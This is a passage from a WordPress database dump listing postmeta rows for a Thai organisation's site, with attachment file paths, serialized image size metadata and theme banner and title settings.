";i:59025;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"โครงสร้าง-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31140;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3447,546,'_thumbnail_id','1276'),
(3448,1277,'title_style','hidden'),
(3449,1277,'_title_style','field_5d1a0217cf408'),
(3450,546,'banner',''),
(3451,546,'_banner','field_5d1a0350fc654'),
(3452,546,'banner_blur','20'),
(3453,546,'_banner_blur','field_5d1a0527f6a99'),
(3454,546,'banner_opacity','0.7'),
(3455,546,'_banner_opacity','field_5d1a1731cd08c'),
(3456,546,'headline_title',''),
(3457,546,'_headline_title','field_5d551d91f7c04'),
(3458,546,'headline_subtitle',''),
(3459,546,'_headline_subtitle','field_5d551d9ff7c05'),
(3460,1278,'title_style','banner'),
(3461,1278,'_title_style','field_5d1a0217cf408'),
(3462,1278,'banner',''),
(3463,1278,'_banner','field_5d1a0350fc654'),
(3464,1278,'banner_blur','20'),
(3465,1278,'_banner_blur','field_5d1a0527f6a99'),
(3466,1278,'banner_opacity','0.7'),
(3467,1278,'_banner_opacity','field_5d1a1731cd08c'),
(3468,1278,'headline_title',''),
(3469,1278,'_headline_title','field_5d551d91f7c04'),
(3470,1278,'headline_subtitle',''),
(3471,1278,'_headline_subtitle','field_5d551d9ff7c05'),
(3472,1280,'_wp_attached_file','2025/05/โครงสร้าง-1.png'),
(3473,1280,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2025/05/โครงสร้าง-1.png\";s:8:\"filesize\";i:72324;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"โครงสร้าง-1-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12079;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"โครงสร้าง-1-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:97187;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"โครงสร้าง-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10463;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"โครงสร้าง-1-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59025;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:41:\"โครงสร้าง-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31140;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3474,1281,'title_style','banner'),
(3475,1281,'_title_style','field_5d1a0217cf408'),
(3476,1281,'banner',''),
(3477,1281,'_banner','field_5d1a0350fc654'),
(3478,1281,'banner_blur','20'),
(3479,1281,'_banner_blur','field_5d1a0527f6a99'),
(3480,1281,'banner_opacity','0.7'),
(3481,1281,'_banner_opacity','field_5d1a1731cd08c'),
(3482,1281,'headline_title',''),
(3483,1281,'_headline_title','field_5d551d91f7c04'),
(3484,1281,'headline_subtitle',''),
(3485,1281,'_headline_subtitle','field_5d551d9ff7c05'),
(3486,1282,'title_style','hidden'),
(3487,1282,'_title_style','field_5d1a0217cf408'),
(3488,1282,'banner',''),
(3489,1282,'_banner','field_5d1a0350fc654'),
(3490,1282,'banner_blur','20'),
(3491,1282,'_banner_blur','field_5d1a0527f6a99'),
(3492,1282,'banner_opacity','0.7'),
(3493,1282,'_banner_opacity','field_5d1a1731cd08c'),
(3494,1282,'headline_title',''),
(3495,1282,'_headline_title','field_5d551d91f7c04'),
(3496,1282,'headline_subtitle',''),
(3497,1282,'_headline_subtitle','field_5d551d9ff7c05'),
(3498,1284,'_wp_attached_file','2025/05/โครงสร้างและอำนาจหน้าที่.pdf'),
(3499,1284,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:536531;}'),
(3500,1285,'title_style','hidden'),
(3501,1285,'_title_style','field_5d1a0217cf408'),
(3502,1285,'banner',''),
(3503,1285,'_banner','field_5d1a0350fc654'),
(3504,1285,'banner_blur','20'),
(3505,1285,'_banner_blur','field_5d1a0527f6a99'),
(3506,1285,'banner_opacity','0.7'),
(3507,1285,'_banner_opacity','field_5d1a1731cd08c'),
(3508,1285,'headline_title',''),
(3509,1285,'_headline_title','field_5d551d91f7c04'),
(3510,1285,'headline_subtitle',''),
(3511,1285,'_headline_subtitle','field_5d551d9ff7c05'),
(3512,1288,'_wp_attached_file','2025/06/ประกาศเจตนารมณ์.pdf'),
(3513,1288,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:133591;}'),
(3515,1290,'_wp_attached_file','2025/06/Is-It-a-Gift-Instagram-Post.png'),
(3516,1290,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2025/06/Is-It-a-Gift-Instagram-Post.png\";s:8:\"filesize\";i:193439;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-300x113.png\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36919;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16005;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-768x288.png\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:179418;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58274;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3517,859,'_thumbnail_id','1298'),
(3518,1291,'title_style','hidden'),
(3519,1291,'_title_style','field_5d1a0217cf408'),
(3520,859,'banner',''),
(3521,859,'_banner','field_5d1a0350fc654'),
(3522,859,'banner_blur','20'),
(3523,859,'_banner_blur','field_5d1a0527f6a99'),
(3524,859,'banner_opacity','0.7'),
(3525,859,'_banner_opacity','field_5d1a1731cd08c'),
(3526,859,'headline_title',''),
(3527,859,'_headline_title','field_5d551d91f7c04'),
(3528,859,'headline_subtitle',''),
(3529,859,'_headline_subtitle','field_5d551d9ff7c05'),
(3530,1292,'title_style','banner'),
(3531,1292,'_title_style','field_5d1a0217cf408'),
(3532,1292,'banner',''),
(3533,1292,'_banner','field_5d1a0350fc654'),
(3534,1292,'banner_blur','20'),
(3535,1292,'_banner_blur','field_5d1a0527f6a99'),
(3536,1292,'banner_opacity','0.7'),
(3537,1292,'_banner_opacity','field_5d1a1731cd08c'),
(3538,1292,'headline_title',''),
(3539,1292,'_headline_title','field_5d551d91f7c04'),
(3540,1292,'headline_subtitle',''),
(3541,1292,'_headline_subtitle','field_5d551d9ff7c05'),
(3542,1293,'title_style','hidden'),
(3543,1293,'_title_style','field_5d1a0217cf408'),
(3544,1293,'banner',''),
(3545,1293,'_banner','field_5d1a0350fc654'),
(3546,1293,'banner_blur','20'),
(3547,1293,'_banner_blur','field_5d1a0527f6a99'),
(3548,1293,'banner_opacity','0.7'),
(3549,1293,'_banner_opacity','field_5d1a1731cd08c'),
(3550,1293,'headline_title',''),
(3551,1293,'_headline_title','field_5d551d91f7c04'),
(3552,1293,'headline_subtitle',''),
(3553,1293,'_headline_subtitle','field_5d551d9ff7c05'),
(3554,1294,'title_style','banner'),
(3555,1294,'_title_style','field_5d1a0217cf408'),
(3556,1294,'banner',''),
(3557,1294,'_banner','field_5d1a0350fc654'),
(3558,1294,'banner_blur','20'),
(3559,1294,'_banner_blur','field_5d1a0527f6a99'),
(3560,1294,'banner_opacity','0.7'),
(3561,1294,'_banner_opacity','field_5d1a1731cd08c'),
(3562,1294,'headline_title',''),
(3563,1294,'_headline_title','field_5d551d91f7c04'),
(3564,1294,'headline_subtitle',''),
(3565,1294,'_headline_subtitle','field_5d551d9ff7c05'),
(3566,1295,'title_style','hidden'),
(3567,1295,'_title_style','field_5d1a0217cf408'),
(3568,1295,'banner',''),
(3569,1295,'_banner','field_5d1a0350fc654'),
(3570,1295,'banner_blur','20'),
(3571,1295,'_banner_blur','field_5d1a0527f6a99'),
(3572,1295,'banner_opacity','0.7'),
(3573,1295,'_banner_opacity','field_5d1a1731cd08c'),
(3574,1295,'headline_title',''),
(3575,1295,'_headline_title','field_5d551d91f7c04'),
(3576,1295,'headline_subtitle',''),
(3577,1295,'_headline_subtitle','field_5d551d9ff7c05'),
(3578,1296,'title_style','default'),
(3579,1296,'_title_style','field_5d1a0217cf408'),
(3580,1296,'banner',''),
(3581,1296,'_banner','field_5d1a0350fc654'),
(3582,1296,'banner_blur','20'),
(3583,1296,'_banner_blur','field_5d1a0527f6a99'),
(3584,1296,'banner_opacity','0.7'),
(3585,1296,'_banner_opacity','field_5d1a1731cd08c'),
(3586,1296,'headline_title',''),
(3587,1296,'_headline_title','field_5d551d91f7c04'),
(3588,1296,'headline_subtitle',''),
(3589,1296,'_headline_subtitle','field_5d551d9ff7c05'),
(3590,1298,'_wp_attached_file','2025/06/Is-It-a-Gift-Instagram-Post112.png'),
(3591,1298,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:42:\"2025/06/Is-It-a-Gift-Instagram-Post112.png\";s:8:\"filesize\";i:149369;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Is-It-a-Gift-Instagram-Post112-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19659;}s:5:\"large\";a:5:{s:4:\"file\";s:43:\"Is-It-a-Gift-Instagram-Post112-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:139106;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post112-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6829;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post112-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88822;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:42:\"Is-It-a-Gift-Instagram-Post112-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36346;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3592,1297,'title_style','hidden'),
(3593,1297,'_title_style','field_5d1a0217cf408'),
(3594,1297,'banner',''),
(3595,1297,'_banner','field_5d1a0350fc654'),
(3596,1297,'banner_blur','20'),
(3597,1297,'_banner_blur','field_5d1a0527f6a99'),
(3598,1297,'banner_opacity','0.7'),
(3599,1297,'_banner_opacity','field_5d1a1731cd08c'),
(3600,1297,'headline_title',''),
(3601,1297,'_headline_title','field_5d551d91f7c04'),
(3602,1297,'headline_subtitle',''),
(3603,1297,'_headline_subtitle','field_5d551d9ff7c05'),
(3604,1299,'title_style','banner'),
(3605,1299,'_title_style','field_5d1a0217cf408'),
(3606,1299,'banner',''),
(3607,1299,'_banner','field_5d1a0350fc654'),
(3608,1299,'banner_blur','20'),
(3609,1299,'_banner_blur','field_5d1a0527f6a99'),
(3610,1299,'banner_opacity','0.7'),
(3611,1299,'_banner_opacity','field_5d1a1731cd08c'),
(3612,1299,'headline_title',''),
(3613,1299,'_headline_title','field_5d551d91f7c04'),
(3614,1299,'headline_subtitle',''),
(3615,1299,'_headline_subtitle','field_5d551d9ff7c05'),
(3616,1301,'title_style','hidden'),
(3617,1301,'_title_style','field_5d1a0217cf408'),
(3618,1301,'banner',''),
(3619,1301,'_banner','field_5d1a0350fc654'),
(3620,1301,'banner_blur','20'),
(3621,1301,'_banner_blur','field_5d1a0527f6a99'),
(3622,1301,'banner_opacity','0.7'),
(3623,1301,'_banner_opacity','field_5d1a1731cd08c'),
(3624,1301,'headline_title',''),
(3625,1301,'_headline_title','field_5d551d91f7c04'),
(3626,1301,'headline_subtitle',''),
(3627,1301,'_headline_subtitle','field_5d551d9ff7c05'),
(3628,859,'footnotes',''),
(3629,1303,'footnotes',''),
(3630,1303,'title_style','hidden'),
(3631,1303,'_title_style','field_5d1a0217cf408'),
(3632,1303,'banner',''),
(3633,1303,'_banner','field_5d1a0350fc654'),
(3634,1303,'banner_blur','20'),
(3635,1303,'_banner_blur','field_5d1a0527f6a99'),
(3636,1303,'banner_opacity','0.7'),
(3637,1303,'_banner_opacity','field_5d1a1731cd08c'),
(3638,1303,'headline_title',''),
(3639,1303,'_headline_title','field_5d551d91f7c04'),
(3640,1303,'headline_subtitle',''),
(3641,1303,'_headline_subtitle','field_5d551d9ff7c05'),
(3642,1304,'footnotes',''),
(3644,1306,'footnotes',''),
(3645,1306,'title_style','hidden'),
(3646,1306,'_title_style','field_5d1a0217cf408'),
(3647,1306,'banner',''),
(3648,1306,'_banner','field_5d1a0350fc654'),
(3649,1306,'banner_blur','20'),
(3650,1306,'_banner_blur','field_5d1a0527f6a99'),
(3651,1306,'banner_opacity','0.7'),
(3652,1306,'_banner_opacity','field_5d1a1731cd08c'),
(3653,1306,'headline_title',''),
(3654,1306,'_headline_title','field_5d551d91f7c04'),
(3655,1306,'headline_subtitle',''),
(3656,1306,'_headline_subtitle','field_5d551d9ff7c05'),
(3657,1307,'footnotes',''),
(3658,1308,'footnotes',''),
(3659,1308,'title_style','hidden'),
(3660,1308,'_title_style','field_5d1a0217cf408'),
(3661,1308,'banner',''),
(3662,1308,'_banner','field_5d1a0350fc654'),
(3663,1308,'banner_blur','20'),
(3664,1308,'_banner_blur','field_5d1a0527f6a99'),
(3665,1308,'banner_opacity','0.7'),
(3666,1308,'_banner_opacity','field_5d1a1731cd08c'),
(3667,1308,'headline_title',''),
(3668,1308,'_headline_title','field_5d551d91f7c04'),
(3669,1308,'headline_subtitle',''),
(3670,1308,'_headline_subtitle','field_5d551d9ff7c05'),
(3671,1309,'footnotes',''),
(3672,1310,'footnotes',''),
(3673,1310,'title_style','hidden'),
(3674,1310,'_title_style','field_5d1a0217cf408'),
(3675,1310,'banner',''),
(3676,1310,'_banner','field_5d1a0350fc654'),
(3677,1310,'banner_blur','20'),
(3678,1310,'_banner_blur','field_5d1a0527f6a99'),
(3679,1310,'banner_opacity','0.7'),
(3680,1310,'_banner_opacity','field_5d1a1731cd08c'),
(3681,1310,'headline_title',''),
(3682,1310,'_headline_title','field_5d551d91f7c04'),
(3683,1310,'headline_subtitle',''),
(3684,1310,'_headline_subtitle','field_5d551d9ff7c05'),
(3685,1311,'footnotes',''),
(3686,1311,'title_style','hidden'),
(3687,1311,'_title_style','field_5d1a0217cf408'),
(3688,1311,'banner',''),
(3689,1311,'_banner','field_5d1a0350fc654'),
(3690,1311,'banner_blur','20'),
(3691,1311,'_banner_blur','field_5d1a0527f6a99'),
(3692,1311,'banner_opacity','0.7'),
(3693,1311,'_banner_opacity','field_5d1a1731cd08c'),
(3694,1311,'headline_title',''),
(3695,1311,'_headline_title','field_5d551d91f7c04'),
(3696,1311,'headline_subtitle',''),
(3697,1311,'_headline_subtitle','field_5d551d9ff7c05'),
(3698,1312,'footnotes',''),
(3700,1314,'_wp_attached_file','2025/06/1.png'),
(3701,1314,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:13:\"2025/06/1.png\";s:8:\"filesize\";i:215090;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:12:\"1-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41407;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31055;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:13:\"1-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:208721;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3702,1315,'_wp_attached_file','2025/06/2.png'),
(3703,1315,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:250;s:4:\"file\";s:13:\"2025/06/2.png\";s:8:\"filesize\";i:253228;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:12:\"2-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43137;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32588;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:13:\"2-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:224151;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:13:\"2-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91426;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3704,1316,'title_style','default'),
(3705,1316,'_title_style','field_5d1a0217cf408'),
(3706,1317,'_edit_lock','1749453968:1'),
(3707,1318,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12.jpg'),
(3708,1318,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:124:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12.jpg\";s:8:\"filesize\";i:263658;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14492;}s:5:\"large\";a:5:{s:4:\"file\";s:125:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117622;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7770;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73292;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18371;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3709,1319,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10.jpg'),
(3710,1320,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9.jpg'),
(3711,1319,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:124:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10.jpg\";s:8:\"filesize\";i:365540;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21645;}s:5:\"large\";a:5:{s:4:\"file\";s:125:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144718;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8611;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92669;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23074;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3712,1320,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9.jpg\";s:8:\"filesize\";i:357602;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19258;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7469;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89369;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21386;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3713,1321,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11.jpg'),
